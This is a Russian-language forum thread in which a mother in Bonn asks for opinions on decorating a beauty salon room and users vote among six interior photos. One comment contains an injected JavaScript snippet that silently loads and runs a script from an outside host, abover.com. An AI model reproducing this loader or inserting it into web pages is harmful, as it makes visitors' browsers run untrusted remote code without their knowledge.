Войти

Хочу с вами посоветоваться...

Мама двоих (6 лет, 2 года) Москва
Зелёный для коллекции)
ac5cdac152c1daf22a3700799fc893f2.jpg
0
28.06.2015
Мама девочки (14 лет) Бонн
ммммм ваууу!!!!!!!!!!! спасибо, дорогая, за картинку super_smilies082.gif 
мне так приятно!!!!!!!!! loveshower.gif
0
28.06.2015
Мама двоих (6 лет, 2 года) Москва
а вообще, я за розовый big_smiles_162.gif
0
28.06.2015
Мама девочки (14 лет) Бонн
спасибо, дорогая super_smilies084.gif
0
28.06.2015
Мама мальчика (14 лет) Новый Орлеан
Мне ваш вариант больше всего понравился
0
29.06.2015
Мама двоих (16 лет, 12 лет) Москва
Вот этот приятный интерьер!
0
29.06.2015
Мама двоих (15 лет, 13 лет)
Мне 4 и 6 нравится..)
[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо🙏🏻
0
29.06.2015
Мама мальчика (16 лет) Москва

Юлечка, очень интересная у тебя задумка, пусть все получится, я за тебя очень радуюсь всегда, ты умничка! я ж помню все твои первые дни, когда ты еще училась ) 

По поводу кабинета- самое лучшее- это придать уют интересными деталями, интерьерными штучками разными, красивыми шторками, чем-то запоминающимся и уютным. Еще бы я посмотрела- почитала про кабинеты в разных салонах, что больше пользуется популярностью в Германии, у нас бы сделала ми-ми-ми, а не типа кабинета врача. А вот в европе не знаю какие эти салоны, к чему люди привыкли и что радует Их глаз.  super_smilies086.gif

0
29.06.2015
Мама девочки (14 лет) Бонн
Здесь тоже любят мимими)) спасибо, моя девочка 🌷🌷🌷
0
29.06.2015
Мама девочки (7 лет) Тверь
Если мастер хороший то все равно какого цвета стены)) больше всего травится бежевый
0
28.06.2015
Мама девочки (14 лет) Бонн
это тоже правда...   idea.gif   беж мне тоже нравится) такой теплый, уютный кабинет... но красить стены проблематично((
0
28.06.2015
Мама девочки (7 лет) Тверь
Тогда акценты пусть будут цветные, тюль, плед, коврик, ваза с цветами
0
28.06.2015
Мама девочки (14 лет) Бонн
ага denis09.gif покажу потом, что получилось))) если получится)))
0
28.06.2015
Мама девочки (14 лет) Тампа
Мне нравятся 2,3 и 4))) Юляш, желаю тебе удачи и пусть все получится так, как ты хочешь)))!
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо большое 💐💐💐
0
29.06.2015
Мама девочки (14 лет) Тампа
💋💋💋💐
0
29.06.2015
Мама двоих (18 лет, 12 лет) Москва
1- очень как то больничному выглядит, я бы там себя чувствовала напряженно. 2, на мой взгляд самое уютное и красивое место. 4 , 6 мне нравятся, в 4 прямо какой то Релакс ( может из за штор?) хотя шторы в таких каб не приветсивуются, но их можно заменить красивыми жалюзями под цвет интерьера или какого либо декора! Удачи тебе в твоих хороших начинаниях на новом месте.
0
29.06.2015
Мама девочки (14 лет) Бонн
спасибо большое)))  шторки в любом случае стирать надо периодически...
0
29.06.2015
Мне нравятся 2,3, 5 более уютно, остальные больше напоминают больничку(

Хотя 4 тоже не плохо.

Иногда приходишь в салон и там как-то по домашнему уютно, а бывает придешь вроде и оборудование есть хорошее, но не комфортно и все.

0
28.06.2015
Мама девочки (14 лет) Бонн

воооот... в помещении энергетика должна быть доброй. спасибо за ответ! super_smilies086.gif

0
28.06.2015
Мама мальчика (13 лет) Люберцы
Мне 3 вариант нравится))ты нестандартная и салон должен быть не стандартный и совсем не напоминать больничку, даже саму ю хорошую)))
0
01.07.2015
Мама девочки (14 лет) Бонн
super_smilies086.gif
0
01.07.2015
Мама двоих (13 лет, 10 лет) Краснодар
4 вариант))вроде стены белые,но эти яркие акценты придают колоритности и яркости!в то же время скромно и со вкусом.Но не обязательно фиолетовый,можно и в фисташковом\персиковом обыграть..
0
30.06.2015
Мама девочки (14 лет) Бонн
🌷🌷🌷
0
30.06.2015
Мама мальчика (14 лет) Раменское

4 и последний гармоничнее всего.

Черный как-то на любителя, а остальные напоминают мед учреждения (не хочется таких ассоциаций)

0
30.06.2015
Мама девочки (14 лет) Бонн
Спасибо, моя хорошая)
0
30.06.2015
Мама мальчика (9 лет) Краснодар
я за 5,6 фото) на первом прям как в кабинете у врача) 3,4 — сильно ярко,на любителя)
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо🙏🏻
0
29.06.2015
Мама девочки (20 лет) Москва
Мне нравятся 4 и 6 варианты. Хочется уюта домашнего, а не как на 1 фото больничной палаты У тебя со вкусом на высоте все, и все обязательно получится)))
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо) я буду стараться🌺
0
29.06.2015
Мама девочки (18 лет) Краснодар
Мн нравятся 4 и 6 варианты. Уютно, стильно, с цветами можно поиграть) а вот в 1 не пошла бы-стоматола боюсь)))))
0
29.06.2015
Мама девочки (14 лет) Бонн
спасибо) все девочки подметили, что белый кабинет напоминает больницу)
0
29.06.2015
Мама мальчика (17 лет) Москва
Мне последний вариант нравится. В меру "больнично", в меру уютно. Шторы на окнах никак с услугами, где должна быть стерильность материалов и т.п. не ассоциируются.
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо😍
0
29.06.2015
Мама двоих (21 год, 9 лет) Москва
Зай,привет. Мне очень второй вариант понравился,бежевый.
Уютненько и как-то тепло там) Я бы туда пришла))))))))))
0
29.06.2015
Мама девочки (14 лет) Бонн
Мне тоже он нра)
0
29.06.2015
Мама двоих (15 лет, 7 лет) Москва
1 и 5 не нравятся — как кабинет врача. 2 и 4 приглянулись — уютные. 3 и 6 отрицательных эмоций и дискомфорта тоже не вызывают))
0
29.06.2015
Мама девочки (14 лет) Бонн
Мерсишки)
0
29.06.2015
Мама троих (17 лет, 15 лет, 11 лет) Москва
Мне второй понравился своим уютом и домашностью(шторы и светильник).и последний вариант-более современный вариант
0
29.06.2015
Мама девочки (14 лет) Бонн
🌺🌺🌺
0
29.06.2015
Мама двоих (16 лет, 11 лет) Москва

нравятся последние 3 варианта. но на мой взгляд, пурпурный на 4 фото — очень активный. я бы посмотрела более спокойные его оттенки в палитре.

0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо🙏🏻
0
29.06.2015
Мама мальчика (14 лет) Тверь
Раз стены красить нежелательно, то я за 4й вариант, а там уж цвета можно повыбирать, не обязательно сиреневый/лиловый. Хотя этот цвет мне нравится.
0
29.06.2015
Мама девочки (14 лет) Бонн
Красный можно)
0
29.06.2015
Мама двоих (19 лет, 13 лет) Москва
Я за 6 вариант.
Визуально нравится, стены спокойные и в тоже время есть яркие акценты.
0
29.06.2015
Мама девочки (14 лет) Бонн
Да там стильно👍🏼
0
29.06.2015
Мама двоих (24 года, 16 лет)
Мне 4 и 6 нравится. 1 и 2 точно нет, ассоциация с чем то больничным.
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо!
0
29.06.2015
Мама двоих (16 лет, 12 лет) Москва
3- пошло как-то выглядит. 5,6 примерно одинаковые стены. Скорее выбрала бы что то среднее между 1 и 2
0
29.06.2015
Мама девочки (14 лет) Бонн
Большое спасибо!🌺🌺🌺
0
29.06.2015
Мама троих (20 лет, 13 лет, 10 лет) Москва
Мне не нравятся 1 (совсем больница) и 3 ( я такое просто вообще не люблю), а остальные все симпатичные))
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо!
0
29.06.2015
Мама мальчика (14 лет) Монреаль
если именно салон красоты то я за классический стиль; молдинги, лепнина, позолота, зеркала, глянец, мрамор.
0
28.06.2015
Мама девочки (14 лет) Бонн
thumbup.gif
0
28.06.2015
Мама девочки (15 лет) Курск

нравяться 2,5,6

в вашем случае подойдет вариант 4 тоже не плохо смотрится.останутся белые стены ,а декор в цвете 

0
28.06.2015
Мама девочки (14 лет) Бонн

спасибо большое throb.gif

0
28.06.2015
Мама двоих (13 лет, 8 лет) Москва

6! И 4 ничего так. Мне было бы не так комфортно в 1, напоминает кабинет врача — не насслабиться.

0
28.06.2015
Мама девочки (14 лет) Бонн

спасибо, Ксюшенька super_smilies086.gif

0
28.06.2015
Мама мальчика (15 лет) Москва
Пастельные тона-персиковый розовый голубой.люблю когда картины с природой висят,с животными.когда есть цветочки или фонтанчики)
0
28.06.2015
Мама девочки (14 лет) Бонн
да, живые цветы будут очень кстати) спасибо большое)
0
28.06.2015
Мама мальчика (13 лет) Ростов-на-Дону
Из представленных последний вариант выигрывает!
0
29.06.2015
Мама девочки (14 лет) Бонн
Да там красиво)
0
29.06.2015
Мама девочки (11 лет) Симферополь

Я за 2 и последний! Обращаю внимание на чистоту всегда. Приборов в том числе!! 

0
29.06.2015
Мама девочки (14 лет) Бонн
Правильно👍🏼
0
29.06.2015
Мама двоих (15 лет, 13 лет) Старый Оскол

последнее фото радует) удачи в новом деле,Юльчик!!!

0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо❤️❤️❤️
0
29.06.2015
Мама двоих (14 лет, 11 лет) Киль

я бы чтото зеленоватое салатное с фиотлетовым сделала...Только нежно нежные цвета

0
29.06.2015
Мама девочки (14 лет) Бонн
обожаю это сочетание...)
0
29.06.2015
Мама троих (23 года, 16 лет, 13 лет) Москва

1 и 5 слишком просто) 2 и 4 уютно. З слишком тематическое )))тяжело ! 

0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо большое🌺
0
29.06.2015
Мама двоих (14 лет, 6 лет) Москва

последний вариант,на мой взгляд самый стильный

0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо☺️☺️☺️
0
29.06.2015
Мама мальчика (15 лет) Москва
Мне 6 понравился,ничего лишнего и в то же время стильно)
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибооо❤️
0
29.06.2015
Мама девочки (14 лет) Москва
Мне понравился второй и третий вариант, а так же я и за белый).
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо💐💐💐
0
29.06.2015
Мама девочки (12 лет) Штутгарт
лично по мне, 4й самый приятный для глаза) 
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо большое🌸🌸🌸
0
29.06.2015
Мама двоих (18 лет, 13 лет) Одинцово
вариант с орхидеей оч нравится! (не в орхидее дело конечно)))
0
29.06.2015
Мама девочки (14 лет) Бонн
☺️☺️☺️
0
29.06.2015
Мама двоих (16 лет, 6 лет) Анапа

из этих нравится лиловый с белым

0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо🙏🏻
0
29.06.2015
Мама двоих (14 лет, 13 лет) Москва
Мне больше последний вариант понравился)
0
29.06.2015
Мама девочки (14 лет) Бонн
Спасибо)
0
29.06.2015
Мама двоих (15 лет, 12 лет) Орел
4,5,6! А первые картинки почему- то со стоматологом ассоциируются)
0
29.06.2015
Мама девочки (14 лет) Бонн
Точно)
0
29.06.2015
Моя подвязка спустя 5 месяцев Косметика из Н&М

Похожие записи